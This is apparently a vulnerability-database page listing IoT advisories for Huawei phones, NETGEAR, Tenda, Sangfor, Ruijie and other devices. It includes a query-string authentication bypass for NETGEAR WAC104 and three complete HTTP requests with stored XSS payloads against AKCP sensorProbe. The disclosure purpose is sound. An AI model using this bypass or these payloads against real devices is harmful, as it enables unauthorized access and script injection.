VARIoT IoT vulnerabilities database

There is a Missing Cryptographic Step vulnerability in Huawei Smartphone. Successful exploitation of this vulnerability may cause DoS of Samgr. Huawei Smartphone is a smartphone of the Chinese company Huawei (Huawei)

NETGEAR WAC104 devices before 1.0.4.15 are affected by an authentication bypass vulnerability in /usr/sbin/mini_httpd, allowing an unauthenticated attacker to invoke any action by adding the &currentsetting.htm substring to the HTTP query, a related issue to CVE-2020-27866. This directly allows the attacker to change the web UI password, and eventually to enable debug mode (telnetd) and gain a shell on the device as the admin limited-user account (however, escalation to root is simple because of weak permissions on the /etc/ directory). NETGEAR WAC104 There is an authentication vulnerability in the device.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. NETGEAR WAC104 is a wireless access point (AP) from Netgear

NBG-418N is a wireless router device launched by Zhongqin Communication Equipment Trading (Shanghai) Co., Ltd. Zhongqin Communication Equipment Trading (Shanghai) Co., Ltd. NBG-418N has a weak password vulnerability, which can be exploited by attackers to obtain sensitive information.

TL-IPC223, etc. are all network camera products of Prolink Technology Co., Ltd. Many products of Prolink Technology Co., Ltd. have weak password vulnerabilities, which can be exploited by attackers to obtain sensitive information.

Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields. AKCP sensorProbe is a platform-independent environmental and safety monitoring equipment of AKCP company in the United States. Just assign an IP address and connect to the embedded web server. The correct verification of client data, an attacker can use this vulnerability to lure users to click to execute client code to steal user cookie credentials. 1) Stored Cross-Site Scripting via System Settings POST /system?time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 114 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/system?time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close _SA01=System+Namer&_SA02=RDC&_SA03=Name<svg/onload=alert`xss`>&_SA04=1&_SA06=0&_SA36=0&_SA37=0&sbt1=Save 2) Stored Cross-Site Scripting via Email Settings POST /mail?time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 162 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/mail?time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close _PS03=test@test.com&_PS04=test@test.com&_PS05_0=test@test.com&_PS05_1=test@test.comr&_PS05_3=<svg/onload=alert`xxss`>&_PS05_4=&sbt2=Save 3) Stored Cross-Site Scripting via Sensor Description POST /senswatr?index=0&time=32e004c941f912 HTTP/1.1 Host: [target] Content-Length: 55 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://[target] Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://[target]/senswatr?index=0&time=32e004c941f912 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: CPCookie=sensors=400 Connection: close _WT00-IX="><svg/onload=alert`xss`>&_WT03-IX=2&sbt1=Save

The micro-enterprise integrated gateway is a VPN router under the Tenda brand. Tenda Micro-enterprise integrated gateway has a logic flaw vulnerability, which can be used by attackers to gain unauthorized access.

Shandong Bit Intelligent Technology Co., Ltd. is a high-tech enterprise integrating design, research and development, production and sales. Shandong Bit Intelligent Technology Co., Ltd. Lim-SW5PV8 has a weak password vulnerability, which can be exploited by attackers to obtain sensitive information.

BRICS Communication Technology is the world's leading provider of online video solutions. The Brickcom FB-200Np camera has a weak password vulnerability, which can be exploited by attackers to obtain sensitive information.

NBG-416N is a wireless router device launched by Zhongqin Communication Equipment Trading (Shanghai) Co., Ltd. Zhongqin Communication Equipment Trading (Shanghai) Co., Ltd. NBG-416N has a weak password vulnerability, which can be exploited by attackers to obtain sensitive information.

S5100 and P5100 are hardware gateway products of Sangfor Technology Co., Ltd. Sangfor Technology Co., Ltd. S5100 and P5100 have a weak password vulnerability, which can be exploited by attackers to obtain sensitive information.

Shandong Bit Intelligent Technology Co., Ltd. is a high-tech enterprise integrating design, research and development, production and sales. Shandong Bit Intelligent Technology Co., Ltd. Lim-SW5PV24 has a weak password vulnerability, which can be exploited by attackers to obtain sensitive information.

RG-NBS2026G is a switch launched by Beijing Xingwang Ruijie Network Technology Co., Ltd. Beijing Xingwang Ruijie Network Technology Co., Ltd. RG-NBS2026G has a command execution vulnerability, which can be used by attackers to execute arbitrary commands.

A component of the HarmonyOS has a Improper Privilege Management vulnerability. Local attackers may exploit this vulnerability to bypass user restrictions. A Huawei phone is a Huawei smartphone from the Chinese Huawei (Huawei) company. Huawei smartphones have security flaws. Successful exploitation of this vulnerability could compromise service confidentiality, availability, and integrity

A component of the HarmonyOS has a Privilege Dropping / Lowering Errors vulnerability. Local attackers may exploit this vulnerability to obtain Kernel space read/write capability. A Huawei phone is a Huawei smartphone from the Chinese Huawei (Huawei) company. Huawei smartphones have a security flaw that stems from incorrect permission assignments. This vulnerability could affect service confidentiality

There is an Integer Overflow Vulnerability in Huawei Smartphone. Successful exploitation of these vulnerabilities may escalate the permission to that of the root user. A Huawei phone is a Huawei smartphone from the Chinese Huawei (Huawei) company. Huawei smartphones have security flaws

There is an Information Disclosure Vulnerability in Huawei Smartphone. Successful exploitation of this vulnerability may cause out-of-bounds read. A Huawei phone is a Huawei smartphone from the Chinese Huawei (Huawei) company

There is a Memory Buffer Improper Operation Limit Vulnerability in Huawei Smartphone. Successful exploitation of this vulnerability may cause the kernel to restart. A Huawei phone is a Huawei smartphone from the Chinese Huawei (Huawei) company. There is a security vulnerability in Huawei smartphones

There is a Configuration Defect Vulnerability in Huawei Smartphone. Successful exploitation of this vulnerability may allow attackers to hijack the device and forge UIs to induce users to execute malicious commands. A Huawei phone is a Huawei smartphone from the Chinese Huawei (Huawei) company. The following products and versions are affected: EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, Magic UI 4.0.0, Magic UI 3.1.1

There is a Credentials Management Errors Vulnerability in Huawei Smartphone. Successful exploitation of this vulnerability may induce users to grant permissions on modifying items in the configuration table,causing system exceptions. A Huawei phone is a Huawei smartphone from the Chinese Huawei (Huawei) company. The following products and versions are affected: EMUI 11.0.1, EMUI 11.0.0, EMUI 10.1.1, Magic UI 4.0.0, Magic UI 3.1.1

There is a Memory Buffer Improper Operation Limit Vulnerability in Huawei Smartphone. Successful exploitation of this vulnerability may cause the device to crash and restart. A Huawei phone is a Huawei smartphone from the Chinese Huawei (Huawei) company. The following products and versions are affected: EMUI 11.0.0, EMUI 10.1.1, Magic UI 4.0.0, Magic UI 3.1.1